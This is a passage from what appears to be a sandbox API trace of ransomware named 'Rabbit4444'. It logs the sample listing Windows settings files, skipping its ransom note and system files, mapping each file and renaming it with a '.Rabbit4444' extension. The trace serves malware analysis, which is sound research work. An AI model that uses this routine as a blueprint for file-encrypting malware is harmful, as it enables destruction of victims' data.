ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ddb890b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", cAlternateFileName="CLF20A~1.SET")) returned 1 [0058.618] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.618] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.618] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2=".") returned 1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="..") returned 1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="windows") returned -1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="boot") returned 1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.619] lstrcmpiW (lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.619] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms" | out: lpString1="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms") returned="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms" [0058.619] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.619] lstrlenW (lpString="Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms") returned 64 [0058.619] lstrlenW (lpString="Rabbit4444") returned 10 [0058.619] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.619] lstrlenW (lpString=".dll") returned 4 [0058.619] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.619] lstrlenW (lpString=".lnk") returned 4 [0058.619] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.619] lstrlenW (lpString=".ini") returned 4 [0058.619] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.619] lstrlenW (lpString=".sys") returned 4 [0058.619] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4a2f952e-0618-467f-adc5-febb66aeb82f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.620] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.620] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14993036420) returned 1 [0058.620] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=969) returned 1 [0058.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0058.620] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.620] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.621] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.622] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0058.622] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14993299192) returned 1 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.622] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.622] CloseHandle (hObject=0x298) returned 1 [0058.622] CloseHandle (hObject=0x278) returned 1 [0058.623] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms.Rabbit4444") returned 192 [0058.623] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4a2f952e-0618-467f-adc5-febb66aeb82f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4A2F952E-0618-467F-ADC5-FEBB66AEB82F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4a2f952e-0618-467f-adc5-febb66aeb82f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.623] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4de512bb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4de512bb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", cAlternateFileName="CLED2B~1.SET")) returned 1 [0058.623] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.623] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2=".") returned 1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="..") returned 1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="windows") returned -1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="boot") returned 1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.624] lstrcmpiW (lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.624] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms" | out: lpString1="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms") returned="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms" [0058.624] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.624] lstrlenW (lpString="Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms") returned 64 [0058.624] lstrlenW (lpString="Rabbit4444") returned 10 [0058.624] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.624] lstrlenW (lpString=".dll") returned 4 [0058.624] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.624] lstrlenW (lpString=".lnk") returned 4 [0058.624] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.625] lstrlenW (lpString=".ini") returned 4 [0058.625] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.625] lstrlenW (lpString=".sys") returned 4 [0058.625] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4bcd16d0-ba72-4f0d-88f9-50d912bfa2b2}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.625] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.625] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14993572088) returned 1 [0058.625] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1116) returned 1 [0058.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0058.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0058.625] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0058.627] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0058.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14993866567) returned 1 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0058.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0058.628] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.628] CloseHandle (hObject=0x298) returned 1 [0058.628] CloseHandle (hObject=0x278) returned 1 [0058.628] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms.Rabbit4444") returned 192 [0058.628] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4bcd16d0-ba72-4f0d-88f9-50d912bfa2b2}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{4BCD16D0-BA72-4F0D-88F9-50D912BFA2B2}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{4bcd16d0-ba72-4f0d-88f9-50d912bfa2b2}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.629] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4df360db, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4df360db, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23137ab2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", cAlternateFileName="CL20E9~1.SET")) returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2=".") returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="..") returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="windows") returned -1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="boot") returned 1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.629] lstrcmpiW (lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.629] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms" | out: lpString1="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms") returned="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms" [0058.629] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.630] lstrlenW (lpString="Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms") returned 64 [0058.630] lstrlenW (lpString="Rabbit4444") returned 10 [0058.630] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.630] lstrlenW (lpString=".dll") returned 4 [0058.630] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.630] lstrlenW (lpString=".lnk") returned 4 [0058.630] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.630] lstrlenW (lpString=".ini") returned 4 [0058.630] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.630] lstrlenW (lpString=".sys") returned 4 [0058.630] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.630] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{50df4f13-4188-49c3-b2fb-a76404dc0acf}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.630] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.630] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14994101223) returned 1 [0058.630] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=991) returned 1 [0058.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0058.630] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.633] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.634] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14994498181) returned 1 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.634] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0058.634] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.634] CloseHandle (hObject=0x298) returned 1 [0058.634] CloseHandle (hObject=0x278) returned 1 [0058.635] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms.Rabbit4444") returned 192 [0058.635] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{50df4f13-4188-49c3-b2fb-a76404dc0acf}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{50DF4F13-4188-49C3-B2FB-A76404DC0ACF}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{50df4f13-4188-49c3-b2fb-a76404dc0acf}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.635] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dfcea4d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4dfcea4d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x487, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", cAlternateFileName="CLCE03~1.SET")) returned 1 [0058.635] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.635] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.635] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2=".") returned 1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="..") returned 1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="windows") returned -1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="boot") returned 1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.636] lstrcmpiW (lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.636] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms" | out: lpString1="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms") returned="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms" [0058.636] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.636] lstrlenW (lpString="Classic_{5163E94E-4C07-420B-B173-320232B8AFB7}.settingcontent-ms") returned 64 [0058.636] lstrlenW (lpString="Rabbit4444") returned 10 [0058.636] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.636] lstrlenW (lpString=".dll") returned 4 [0058.636] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.636] lstrlenW (lpString=".lnk") returned 4 [0058.636] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.636] lstrlenW (lpString=".ini") returned 4 [0058.636] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.636] lstrlenW (lpString=".sys") returned 4 [0058.636] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.636] CreateFileW 